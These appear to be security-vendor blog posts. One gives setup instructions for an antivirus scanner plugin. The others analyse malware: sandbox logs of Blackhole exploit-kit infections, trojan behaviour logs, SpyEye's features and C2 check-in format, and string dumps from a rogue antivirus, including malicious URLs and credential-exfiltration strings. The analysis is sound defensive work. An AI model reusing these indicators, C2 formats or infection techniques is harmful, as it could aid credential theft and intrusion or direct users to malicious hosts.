Download Ikarus T3 (T3 VDB + T3 Commandline Scanner):

http://updates.ikarus.at/updates/update.html

Extract ikarust3scan.exe in:

C:\AVs\Ikarus\

Place there also t3sigs.vdb.

Now open EXE Radar Pro and click the [TAB] Behavioral.

Open the [TAB] Custom Scanners.

Put a check in Enable Custom Scanners.

Select the file:

C:\Programmi\NoVirusThanks\EXE Radar Pro\Examples\Config.ini

In the section “INI File Path:”.

Make sure there is the configuration for Ikarus T3:

[Ikarus]
Enabled=1
Mode=1
ExePath=C:\AVs\Ikarus\t3scan.exe
LogFile=C:\AVs\Ikarus\Ikarus.log
CmdLine=-logfile “%LOG%” -n -na “%FILE%”
Regex=\-\sSignature\s[0-9]*\s\’(.+?)\’\sfound
UniqueString=%FILENAME%

Make sure the other Antivirus scanners you do not have are disabled:

Enabled=0

Now all should be configured correctly.

To make a test, download the EICAR Test File and place it on:

C:\eicar.com

Select it on “Test with File:” section, same as image below:

Click the button “Test” and you should see a message like this:

Now if you try to open the file C:\eicar.com you should see:

Every unknown process is now scanned by Ikarus T3.

It is possible to integrate multiple Antivirus scanners, make sure to read the license terms of each Antivirus scanner that you plan to integrate with EXE Radar Pro. If you have bought a license for EXE Radar Pro and you need help in configuring it with other Antivirus scanners or with a custom application, contact us at support[_at_]novirusthanks[_dot_]org.

hxxp://epnfmackey. info/index.php?tp=81350e0ebb536599

It looks like the Blackhole Exploit Kit URL format!

Malicious code can be found by analyzing the page source:

The main redirect was created by this malicious URL:

hxxp://www.buy-itraconazole. info/noob-tube&page=6

Analysis from NoVirusThanks Sandbox:

Connection Established - %ProgramFiles%\Internet Explorer\iexplore.exe - TCP - 69.197.128.251 - 80
Web Request - %ProgramFiles%\Internet Explorer\iexplore.exe - GET - www.buy-itraconazole.info - /noob-tube&page=6
File Created - %ProgramFiles%\Internet Explorer\iexplore.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\WRLEMEZ4\CA5W03HT.htm - 994C86779A58280B51A47C9C82A2BC59 - 3116 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\iexplore.exe - TCP - 109.230.246.235 - 80
Web Request - %ProgramFiles%\Internet Explorer\iexplore.exe - GET - epnfmackey.info - /index.php?tp=81350e0ebb536599
File Created - %ProgramFiles%\Internet Explorer\iexplore.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\DX0O3V3I\noob-tube&page=6[1].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - %ProgramFiles%\Internet Explorer\iexplore.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\OJZMJR51\index[1].htm - 08C705F161225EC75DF38A33DC50A692 - 46164 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\iexplore.exe - TCP - 109.230.246.235 - 80
Web Request - %ProgramFiles%\Internet Explorer\iexplore.exe - GET - epnfmackey.info - /d.php?f=32&e=4
Connection Established - %ProgramFiles%\Internet Explorer\iexplore.exe - TCP - 65.55.13.243 - 80
Web Request - %ProgramFiles%\Internet Explorer\iexplore.exe - POST - activex.microsoft.com - /objects/ocget.dll
File Modified - %ProgramFiles%\Internet Explorer\iexplore.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\B2H662ZO\calc[1].exe
File Modified - %ProgramFiles%\Internet Explorer\iexplore.exe - %UserProfile%\adobeupdate.exe
Process Created - %ProgramFiles%\Internet Explorer\iexplore.exe - %UserProfile%\adobeupdate.exe - Unknown Publisher - EF3E6A8D8C192FBF565A6D0894BF9256 - 13056 bytes
File Created - %ProgramFiles%\Internet Explorer\iexplore.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\B2H662ZO\calc[1].exe - EF3E6A8D8C192FBF565A6D0894BF9256 - 13056 bytes - attr: [] - PE
File Created - %ProgramFiles%\Internet Explorer\iexplore.exe - %UserProfile%\adobeupdate.exe - EF3E6A8D8C192FBF565A6D0894BF9256 - 13056 bytes - attr: [] - PE
Connection Established - %UserProfile%\adobeupdate.exe - TCP - 77.79.11.74 - 25
Connection Established - %UserProfile%\adobeupdate.exe - TCP - 77.79.11.74 - 8000
File Modified - %UserProfile%\adobeupdate.exe - %AppData%\IMPOST~1\Temp\_1.tmp
Process Created - %UserProfile%\adobeupdate.exe - %AppData%\IMPOST~1\Temp\_1.tmp - Unknown Publisher - 874CE64099537E11E0D52C7D364BD51C - 41984 bytes
File Modified - %UserProfile%\adobeupdate.exe - %AppData%\IMPOST~1\Temp\_2.tmp
Process Created - %UserProfile%\adobeupdate.exe - %AppData%\IMPOST~1\Temp\_2.tmp - Unknown Publisher - F6EC42C9E943A89D15473416669BCCED - 133632 bytes
File Modified - %AppData%\IMPOST~1\Temp\_2.tmp - C:\WINDOWS\system32\dimsntfy32.dll
File Created - %UserProfile%\adobeupdate.exe - %Temp%\_1.tmp - 874CE64099537E11E0D52C7D364BD51C - 41984 bytes - attr: [] - PE
File Created - %UserProfile%\adobeupdate.exe - %Temp%\_2.tmp - F6EC42C9E943A89D15473416669BCCED - 133632 bytes - attr: [] - PE
Connection Established - %AppData%\IMPOST~1\Temp\_1.tmp - TCP - 95.143.35.118 - 80
Web Request - %AppData%\IMPOST~1\Temp\_1.tmp - POST - 95.143.35.118 - /2/gate_goo.php
File Created - %UserProfile%\adobeupdate.exe - %Temp%\_2.tmp - F6EC42C9E943A89D15473416669BCCED - 133632 bytes - attr: [-normal] - PE
File Created - %AppData%\IMPOST~1\Temp\_2.tmp - C:\WINDOWS\system32\dimsntfy32.dll - 25A0121173968364ACC7AC8005EDAEE0 - 113664 bytes - attr: [] - PE

Both malicious domains are detected by only 1 blacklist:

http://www.urlvoid.com/scan/epnfmackey.info
http://www.urlvoid.com/scan/buy-itraconazole.info

Pay attention when searching for images in Google Images!

hxxp://somerandomiframedomain. com

Activity:

Connection Established - %ProgramFiles%\Internet Explorer\iexplore.exe - TCP - 92.38.232.92 - 80
Web Request - %ProgramFiles%\Internet Explorer\iexplore.exe - GET - somerandomiframedomain.com - /forum.php?tp=9c7447caf251fe78
File Created - %ProgramFiles%\Internet Explorer\iexplore.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\OJZMJR51\forum[1].htm - 05BF0A782B09E63E962AF592C04CF640 - 16304 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\iexplore.exe - TCP - 64.4.52.169 - 80
Web Request - %ProgramFiles%\Internet Explorer\iexplore.exe - POST - activex.microsoft.com - /objects/ocget.dll
Connection Established - %ProgramFiles%\Internet Explorer\iexplore.exe - TCP - 92.38.232.92 - 80
Web Request - %ProgramFiles%\Internet Explorer\iexplore.exe - GET - somerandomiframedomain.com - /k.php?f=44&e=4
Web Request - %ProgramFiles%\Internet Explorer\iexplore.exe - POST - codecs.microsoft.com - /isapi/ocget.dll
File Modified - %ProgramFiles%\Internet Explorer\iexplore.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\B2H662ZO\info[1].exe
File Created - %ProgramFiles%\Internet Explorer\iexplore.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\B2H662ZO\info[1].exe - 7B6A870B66170AA254850D290D0E3BF1 - 16038 bytes - attr: [] - -
File Created - %ProgramFiles%\Internet Explorer\iexplore.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\B2H662ZO\CACPYZ8H.HTM - D54404273005B88BE8E663BB2FFFA833 - 1178 bytes - attr: [] - -
File Modified - %ProgramFiles%\Internet Explorer\iexplore.exe - %UserProfile%\adobeupdate.exe
Process Created - %ProgramFiles%\Internet Explorer\iexplore.exe - %UserProfile%\adobeupdate.exe - l - E29AB3125BA3743C591AFE34B7CF3983 - 27136 bytes
File Created - %ProgramFiles%\Internet Explorer\iexplore.exe - %UserProfile%\adobeupdate.exe - E29AB3125BA3743C591AFE34B7CF3983 - 27136 bytes - attr: [] - PE
Connection Established - %UserProfile%\adobeupdate.exe - TCP - 84.51.38.170 - 80
Web Request - %UserProfile%\adobeupdate.exe - GET - www.bilalbabalikli.com - /flash/Output.exe
File Modified - %UserProfile%\adobeupdate.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\OJZMJR51\Output[1].exe
File Created - %UserProfile%\adobeupdate.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\OJZMJR51\Output[1].exe - 3C122FF114213CC13D2026F6BB35B916 - 11347 bytes - attr: [] - -
File Modified - %UserProfile%\adobeupdate.exe - %AppData%\IMPOST~1\Temp\APxKq.exe
Process Created - %UserProfile%\adobeupdate.exe - %AppData%\IMPOST~1\Temp\APxKq.exe - Unknown Publisher - 699BA174BC7DE1AECC615F23AE7124D7 - 798720 bytes
Process Created - %UserProfile%\adobeupdate.exe - %UserProfile%\adobeupdate.exe - l - E29AB3125BA3743C591AFE34B7CF3983 - 27136 bytes
Process Created - %AppData%\IMPOST~1\Temp\APxKq.exe - %AppData%\IMPOST~1\Temp\APxKq.exe - Unknown Publisher - 699BA174BC7DE1AECC615F23AE7124D7 - 798720 bytes
File Modified - C:\WINDOWS\Explorer.EXE - C:\RECYCLER\98D634CFE30.exe
Process Created - C:\WINDOWS\Explorer.EXE - C:\RECYCLER\98D634CFE30.exe - Unknown Publisher - 699BA174BC7DE1AECC615F23AE7124D7 - 798720 bytes
File Created - C:\WINDOWS\Explorer.EXE - C:\RECYCLER\98D634CFE30.exe - 699BA174BC7DE1AECC615F23AE7124D7 - 798720 bytes - attr: [] - PE
Process Created - C:\RECYCLER\98D634CFE30.exe - C:\RECYCLER\98D634CFE30.exe - Unknown Publisher - 699BA174BC7DE1AECC615F23AE7124D7 - 798720 bytes
File Created - C:\RECYCLER\98D634CFE30.exe - C:\RECYCLER\AC5C937E7FCCD47 - 6CDC7010B83EB5DE5501A8B48B636E82 - 360009 bytes - attr: [] - -
Connection Established - C:\WINDOWS\Explorer.EXE - TCP - 212.150.164.206 - 80

Infected website:

hxxp://stocunintermussfp.4dq. com

Activity:

Connection Established - %ProgramFiles%\Internet Explorer\iexplore.exe - TCP - 174.37.210.229 - 80
Web Request - %ProgramFiles%\Internet Explorer\iexplore.exe - GET - stocunintermussfp.4dq.com - /index.php?tp=94df3dd696eea086
File Created - %ProgramFiles%\Internet Explorer\iexplore.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\OJZMJR51\index[1].htm - 57B396000D456745B41DFF19C3CD34D4 - 8493 bytes - attr: [] - -
Connection Established - %ProgramFiles%\Internet Explorer\iexplore.exe - TCP - 174.37.210.229 - 80
Web Request - %ProgramFiles%\Internet Explorer\iexplore.exe - GET - stocunintermussfp.4dq.com - /d.php?f=50&e=4
File Modified - %ProgramFiles%\Internet Explorer\iexplore.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\WRLEMEZ4\calc[1].exe
File Created - %ProgramFiles%\Internet Explorer\iexplore.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\WRLEMEZ4\calc[1].exe - EB3026D4C49B0D2355670856800139F7 - 8227 bytes - attr: [] - -
File Modified - %ProgramFiles%\Internet Explorer\iexplore.exe - C:\adobeupdate.dll
File Created - %ProgramFiles%\Internet Explorer\iexplore.exe - C:\adobeupdate.dll - 1ECAEDB5A4B0EA7DE7C6F0E053968422 - 96256 bytes - attr: [] - PE
Process Created - %ProgramFiles%\Internet Explorer\iexplore.exe - C:\WINDOWS\system32\regsvr32.exe - Microsoft Corporation - DA9623D7E0CA24DD3E08523287E05A4C - 12288 bytes
Connection Established - C:\WINDOWS\system32\regsvr32.exe - TCP - 67.210.105.166 - 80
Connection Established - %ProgramFiles%\Internet Explorer\iexplore.exe - TCP - 64.4.52.169 - 80

TR/PSW.Zbot.2864 (f691ac38366149ac2f077bea304130aa):

Directory Created - %SAMPLE% - %AppData%\Aveni
Directory Created - %SAMPLE% - %AppData%\Lele
File Created - %SAMPLE% - %AppData%\Aveni\tyomw.exe - 56B6F09EDA75D2B1A23CAEAC3DF74C60 - 145920 bytes - attr: [] - PE
Process Created - %SAMPLE% - %AppData%\Aveni\tyomw.exe - Mozilla Foundation - 56B6F09EDA75D2B1A23CAEAC3DF74C60 - 145920 bytes
Connection Established - C:\WINDOWS\Explorer.EXE - TCP - 74.208.244.213 - 80
Web Request - C:\WINDOWS\Explorer.EXE - GET - s350098374.onlinehome.us - /mys.ini
File Modified - %SAMPLE% - %AppData%\IMPOST~1\Temp\tmp11b6b034.bat
File Created - %SAMPLE% - %Temp%\tmp11b6b034.bat - 30C730774F4E9A61E2055DD34D8DCAD6 - 244 bytes - attr: [-normal] - -
Process Created - %SAMPLE% - C:\WINDOWS\system32\cmd.exe - Microsoft Corporation - 94744851B6A9BDCEFCD26CC61A6AFD12 - 397824 bytes
File Deleted - C:\WINDOWS\system32\cmd.exe - %SAMPLE% - 145920 bytes
File Deleted - C:\WINDOWS\system32\cmd.exe - %AppData%\IMPOST~1\Temp\TMP11B~1.BAT - 244 bytes

TR/VBKrypt.dioe (e7cf4d8e210cafcb5b45c92f9e0a547f):

Process Created - %SAMPLE% - %SAMPLE% - K6Gwdrq - E7CF4D8E210CAFCB5B45C92F9E0A547F - 188416 bytes
File Modified - %SAMPLE% - %AppData%\IMPOST~1\Temp\1.tmp
File Created - %SAMPLE% - %Temp%\1.tmp - 75A0AECC55A3F0B9E2D54119FA4AAB6D - 729600 bytes - attr: [] - PE
File Deleted - %SAMPLE% - %AppData%\IMPOST~1\Temp\1.tmp - 729600 bytes
File Modified - %SAMPLE% - %AppData%\IMPOST~1\Temp\2.tmp
File Created - %SAMPLE% - %Temp%\2.tmp - FEB3CC200749FF119BB8B08224A1A594 - 1027584 bytes - attr: [] - PE
File Deleted - %SAMPLE% - %AppData%\IMPOST~1\Temp\2.tmp - 1027584 bytes
Process Created - %SAMPLE% - C:\WINDOWS\explorer.exe - Microsoft Corporation - 178D42BD8FC34A9837417A6CE1D6BB7B - 1034752 bytes
File Created - %SAMPLE% - %Temp%\6.tmp - E7CF4D8E210CAFCB5B45C92F9E0A547F - 188416 bytes - attr: [] - PE
File Modified - C:\WINDOWS\Explorer.EXE - %UserProfile%\Menu Avvio\Programmi\Esecuzione automatica\igfxtray.exe
File Deleted - C:\WINDOWS\Explorer.EXE - %AppData%\IMPOST~1\Temp\6.tmp - 188416 bytes
File Deleted - C:\WINDOWS\Explorer.EXE - %SAMPLE% - 188416 bytes
Connection Established - C:\WINDOWS\system32\svchost.exe - TCP - 212.48.8.140 - 80
Web Request - C:\WINDOWS\system32\svchost.exe - GET - fastsearchportal.org - /cfg/stopav.psd
Web Request - C:\WINDOWS\system32\svchost.exe - GET - fastsearchportal.org - /cfg/passw.psd
Web Request - C:\WINDOWS\system32\svchost.exe - POST - fastsearchportal.org - /jjxndu.phtml
Web Request - C:\WINDOWS\system32\svchost.exe - POST - fastsearchportal.org - /ffzbyorxrn.7z

Worm/Ainslot.A.951 (b88b24c0e103f5adda30912f8365472f):

Process Created - %SAMPLE% - %SAMPLE% - Ares Development Group - B88B24C0E103F5ADDA30912F8365472F - 516096 bytes
File Modified - %SAMPLE% - %AppData%\Bedifender.exe
File Created - %SAMPLE% - %AppData%\Bedifender.exe - B88B24C0E103F5ADDA30912F8365472F - 516096 bytes - attr: [] - PE
Process Created - %SAMPLE% - C:\WINDOWS\system32\cmd.exe - Microsoft Corporation - 94744851B6A9BDCEFCD26CC61A6AFD12 - 397824 bytes
Connection Established - %SAMPLE% - TCP - 41.140.168.39 - 123
Process Created - C:\WINDOWS\system32\cmd.exe - C:\WINDOWS\system32\reg.exe - Microsoft Corporation - BBECF085EE79726B5B7F95FDDA46B2F5 - 53248 bytes
Connection Established - %SAMPLE% - TCP - 67.212.77.13 - 80
Web Request - %SAMPLE% - GET - api.ipinfodb.com - /v2/ip_query_country.php?key=1d1bb511aed00402daada8d8706f74b477e3172d0ca020deab3b43c16441a73d&timezone=off

IRC/Zapchast.AI (ab1dfcf2defb1fcae95e441aa32c5b73):

Directory Created - %SAMPLE% - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500
File Created - %SAMPLE% - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\popups.txt - B9408AF4FBD695E8B022AD8289185D63 - 2601 bytes - attr: [] - -
File Created - %SAMPLE% - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\mirc.ico - E09AA9787AF5CC53FD7525DD6693CF10 - 5694 bytes - attr: [] - -
File Modified - %SAMPLE% - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\csrss.exe
File Created - %SAMPLE% - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\csrss.exe - DEF8C81AF6B9ECA2309B735BFF710AAF - 593262 bytes - attr: [] - PE
File Modified - %SAMPLE% - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\sup.exe
File Modified - %SAMPLE% - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\instsrv.exe
Process Created - %SAMPLE% - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\sup.exe - Unknown Publisher - 8ECF1B30F5FBB12A2FE138364D351A26 - 149742 bytes
File Modified - %SAMPLE% - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\svchost.exe
Process Created - %SAMPLE% - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\sup.exe - Unknown Publisher - 8ECF1B30F5FBB12A2FE138364D351A26 - 149742 bytes
File Modified - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\sup.exe - %AppData%\IMPOST~1\Temp\bt4023.bat
File Created - %SAMPLE% - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\sup.exe - 8ECF1B30F5FBB12A2FE138364D351A26 - 149742 bytes - attr: [] - PE
File Created - %SAMPLE% - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\instsrv.exe - 9F7ACAAD365AF0D1A3CD9261E3208B9B - 32256 bytes - attr: [] - PE
File Created - %SAMPLE% - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\a.reg - 5EE7FE7E4463ECABDB6236033D2C3A05 - 556 bytes - attr: [] - -
File Created - %SAMPLE% - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\svchost.exe - 4635935FC972C582632BF45C26BFCB0E - 8192 bytes - attr: [] - PE
File Created - %SAMPLE% - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\fullname.txt - C509DF67FE3B38FBED191B382B9D3D16 - 23250 bytes - attr: [] - -
File Created - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\sup.exe - %Temp%\bt4023.bat - DF6887D17E2C9912E637347EC7CA20B5 - 220 bytes - attr: [-hidden] - -
Process Created - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\sup.exe - C:\WINDOWS\system32\cmd.exe - Microsoft Corporation - 94744851B6A9BDCEFCD26CC61A6AFD12 - 397824 bytes
Process Created - C:\WINDOWS\system32\cmd.exe - C:\WINDOWS\system32\net.exe - Microsoft Corporation - 5A35852FCADAFCC846AF01020AF1B60C - 42496 bytes
Process Created - C:\WINDOWS\system32\net.exe - C:\WINDOWS\system32\net1.exe - Microsoft Corporation - 0B01298512B628AC862A0DFF586624EE - 124928 bytes
Process Created - C:\WINDOWS\system32\cmd.exe - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\instsrv.exe - Unknown Publisher - 9F7ACAAD365AF0D1A3CD9261E3208B9B - 32256 bytes
Process Created - C:\WINDOWS\system32\cmd.exe - C:\WINDOWS\regedit.exe - Microsoft Corporation - 2452458A26C4DD00E68F060870317675 - 151552 bytes
Process Created - C:\WINDOWS\system32\cmd.exe - C:\WINDOWS\system32\net.exe - Microsoft Corporation - 5A35852FCADAFCC846AF01020AF1B60C - 42496 bytes
Process Created - C:\WINDOWS\system32\net.exe - C:\WINDOWS\system32\net1.exe - Microsoft Corporation - 0B01298512B628AC862A0DFF586624EE - 124928 bytes
Process Created - C:\WINDOWS\system32\services.exe - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\svchost.exe - Unknown Publisher - 4635935FC972C582632BF45C26BFCB0E - 8192 bytes
Process Created - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\svchost.exe - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\csrss.exe - Unknown Publisher - DEF8C81AF6B9ECA2309B735BFF710AAF - 593262 bytes
Directory Created - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\csrss.exe - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\download
Process Created - C:\WINDOWS\system32\svchost.exe - C:\WINDOWS\msagent\agentsvr.exe - Microsoft Corporation - 5FE50F378415EF5F0663BC4FF51878A1 - 256512 bytes
File Created - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\csrss.exe - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\TMP1.$$$ - NOTHING TO HASH - 0 bytes - attr: [] - -
Connection Established - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\csrss.exe - TCP - 94.125.182.255 - 6667
File Deleted - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\sup.exe - %AppData%\IMPOST~1\Temp\bt4023.bat - 220 bytes
Connection Established - C:\RECYCLER\S-1-5-21-606747145-1085031214-725345543-500\csrss.exe - TCP - 72.10.160.204 - 6667

TR/Dropper.Gen (db00bf4a32c4834315106fe8c20b82db):

Process Created - %SAMPLE% - %SAMPLE% - Unknown Publisher - DB00BF4A32C4834315106FE8C20B82DB - 188416 bytes
File Modified - %SAMPLE% - C:\WINDOWS\system32\sdra64.exe
Directory Created - C:\WINDOWS\system32\winlogon.exe - C:\WINDOWS\system32\lowsec
Connection Established - C:\WINDOWS\system32\svchost.exe - TCP - 209.190.61.39 - 80
Web Request - C:\WINDOWS\system32\svchost.exe - GET - lsrgta.com - /farmfres/cfg.bin
Web Request - C:\WINDOWS\system32\svchost.exe - GET - lsrgta.com - /cgi-sys/suspendedpage.cgi

SpyEye was written in C++ and the size of the compiled binary is of 60 KB, the operating systems supported are from Windows 2000 to the recent Windows 7, it works in ring3 mode (same as Zeus Trojan). It is sold as undetected from most Antivirus Software and it is invisible from the task managers and other user-mode applications, it hides the files from the regular explorer searches and it hides also its registry keys.

SpyEye is actually sold by its author at a price of approximately 500 $ USD for a base bundle, it is cheaper than the price of Zeus Trojan that is sold for more than 1,000 $ USD, but it looks like to have all the requirements, if not more, of the famous Zeus Trojan.

The features of SpyEye (v1.0.75) are:

• CC Autofill

Module able to automate the process of getting the money from the stolen credit cards by the bot’s owners using geo ip location.

• Formgrabber with built-in keylogger

Used to capture specific data inserted in a web form.. Mostly used to steal bank accounts and credit cards details when the user need to insert them in legit websites to buy something. The formgrabber works in most used web browsers, such as Firefox, Internet Explorer, Maxthon and Netscape.

• Web Control Panel

The user can control all the bots from a web panel

• Every day the bot send a backup of the database to the owner’s email
• Encrypted config file
• Exe Builder [IMAGE]
• Strings in the resource of the PE are encrypted
• Ban URLs using regular expressions from the control panel
• Steal FTP accounts
• Steal POP3 accounts
• Time interval for bot’s connection to the control panel
• Exe Loader

Used to download and execute a remote file in the victim’s computer.

• Statistics with graphs for bots and loader [IMAGE]
• Zeus spy

SpyEye can watch where Zeus-bot’s main control panel is located.

• Zeus killer [IMAGE]

This new option is able to kill any version of the Zeus Trojan installed in the victim’s computer, making SpyEye the only trojan running on the compromised system.

• Steal basic-authorisation
• Installers for main CP & formgrabber CP [IMAGE] [IMAGE]

Make easier the process of installation of the web interface.

• New abilities for basic-auth

For applications which uses libraries for traffic-encryption

• SpyEye Collector [IMAGE]

Protocol of logs-receiving has changed.
LZO-compression was added.
Logs flying not to PHP-script, now. It fly to the server’s prot, which listening by SpyEye Collector. He accepting connections, read logs from them, and other thread, by-queue, dump accepted logs into MYSQL DB. This scheme will very nice for high botnets.
PHP-CP of formgrabber, now, needs only for logs parsing.
So, very difficult to create abuse-repoort for such server with SpyEye Collector.

• EXE size of SpyEye was reduced

Now, size of compressed SpyEye = 40 KB.

SpyEye trojan, when executed, it creates the following files:

1
2
3

c:\cleansweep.exe\cleansweep.exe
c:\cleansweep.exe\config.bin
%TempFolder%\upd1.tmp

The file cleansweep.exe is the main trojan and the file config.bin is the configuration file encrypted. This is an example of the network traffic generated by this trojan:

1

bt_version_checker.php?guid=%USER%!%COMPUTER%!00000000&ver=10060&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&cpu=57&ccrc=11111111

• guid= %USER% -> Username of the PC
• guid= %COMPUTER% -> Computer name
• guid= 00000000 -> Identification code
• ver= 10060 -> Trojan version
• stat= ONLINE -> Status of the bot
• ie= 6.0.2900.2180 -> Internet Explorer version
• os= 5.1.2600 -> OS version
• ut= Admin -> User task
• cpu= 57 -> CPU
• ccrc= 11111111 -> Maybe it is the “Command CRC”

This is an example network traffic of the trojan that failed to execute a file downloaded remotely:

1

bt_version_checker.php?guid=%USER%!%COMPUTER%!00000000&ver=10060&stat=LOAD-ERROR&tid=1106&rep=CreateProcess()%20fails&cpu=0&ccrc=11111111

The trojan creates the following registry entries:

1
2

HKCU\Software\Microsoft\Windows\CurrentVersion\Run:
cleansweep.exe = "C:\cleansweep.exe\cleansweep.exe"

The trojan runs every time Windows starts.

It is clear that this bot has the same objective of Zeus Trojan and we can also see from the features that it looks a very powerful bot that can surely make even more dangerous the life of the regular internet users and increments the already high problem of the data theft and internet fraud.

Analysis from Malware Intelligence:

SpyEye Bot. Analysis of a new alternative scenario crimeware
SpyEye Bot (Part two). Conversations with the creator of crimeware

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

msxslt3.exe
MsXSLT
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
\ntdll.dll
wininet.dll
Content-Type: application/x-www-form-urlencoded
POST
tmpf
\msxslt.dat
Google Bot
explorer.exe
__SYSTEM32_MSXSLT_
svchost.exe
\\.\pipe\_SYSTEM_MSXML_RUN_
ftpdata=1&user=%s&pass=%s&host=%s
SeDebugPrivilege

We can see various references to a file name msxslt3.exe and it is possible to notice that it will be added in the registry startup key Run\MsXSLT. We can see the malware will send out data to an external website using the method “POST” and we can see also a reference to “Google Bot”, that is probably the user agent that will be used by the malware to execute the POST query.

The reference “__SYSTEM32_MSXSLT_” should be the name of the mutex that will be created to limit the malware to run a single time in the infected system. The two processes name “explorer.exe” and “svchost.exe” are the processes the malware will inject code to. And finally we can see an interesting string:

1

ftpdata=1&user=%s&pass=%s&host=%s

From the above string, we can assume the malware will send data to an ftp server (ftpdata=1) and it will be passed 3 variables, respectively the username, the password and the hostname.

From the other unpacked file, we can extract following data:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64

wget 3.0
Click here to protect your computer from spyware!
Application cannot be executed. The file is infected. Please activate your antivirus software.
WARNING
Advanced Virus Remover installed.
SETUP
winupdate.exe
\Internet Explorer\iexplore.exe 
%s\IS15.exe
hxxp://buyinternetsecurity-2010.com/buy/?code=%s
hxxp://buyinternetsecurity-2010.com/?code=%s
C:\Program Files\InternetSecurity2010\IS2010.exe
AcroRd32.exe
rstrui.exe
CloneCD.exe
cmd.exe
digitaleditions.exe
freecell.exe
FullTiltPoker.exe
GOM.exe
hrtzzm.exe
Icq.exe
Illustrator.exe
miranda32.exe
control.exe
notepad.exe
calc.exe
Attention! System detected a potential hazard (TrojanSPM/LX) on your computer that may infect executable files. You private information and PC safety is at risk. To get rid of unwanted spyware and keep your computer safe you need update your current security software. Click OK to download official intrusion detection system (IDS software)
WARNING
%s\%d.exe
hxxp://testavrdown.com/cgi-bin/get.pl?l=%s
hxxp://vs-codec-pro.net/form.php?code=%s
Windows can`t play the folowing media formats: AVI;WMV;AVS;FLV;MKV;MOV;3GP;MP4;MPG;MPEG;MP3;AAC;WAV;WMA;CDA;FLAC;M4A;MID. Update your video and sound codec to resolve this issue.
Fatal Error
regsvr32 /s %s
%s\helper32.dll
hxxp://downloadavr25.com/dfghfghgfj.dll
hxxp://downloadavr25.com/cgi-bin/download.pl?code=%s
hxxp://downloadavr25.com/loads.php?code=%s
%s\warning.html
Spyware Alert!
winlogon32.exe
smss32.exe
Software\Microsoft\Windows\CurrentVersion\Run
%s%s
%s\winlogon32.exe
%s\smss32.exe
NoActiveDesktopChanges
NoChangingWallpaper
Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
NoSetActiveDesktop
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
DisableTaskMgr
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\IS2010
Software\AVR
Software\RealAV
Userinit
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
userinit.exe
Software\AntivirusXP
faa56ae0-fc64-41fc-b286-fed9abcd401e
Software
8636065b-fef0-4255-b14f-54639f7900a4

We can see from the data above that the file in question is the executable of the rogue security software named IS2010.exe (Internet Security 2010). We can see that this rogue will install files in system directories, will hijack the registry disabling the task manager and other important features, will hijack the execution of pre-defined processes or files (such as regedit.exe or movie files), and will show fake security warnings when an user run the specific processes or try to watch a movie. The alerts that should be generated when an user try to open the “blacklisted” processes or when try to play a movie are the following:

1
2

Application cannot be executed. The file is infected. Please activate your antivirus software.
Windows can`t play the folowing media formats: AVI;WMV;AVS;FLV;MKV;MOV;3GP;MP4;MPG;MPEG;MP3;AAC;WAV;WMA;CDA;FLAC;M4A;MID. Update your video and sound codec to resolve this issue.

Fake alert in action:

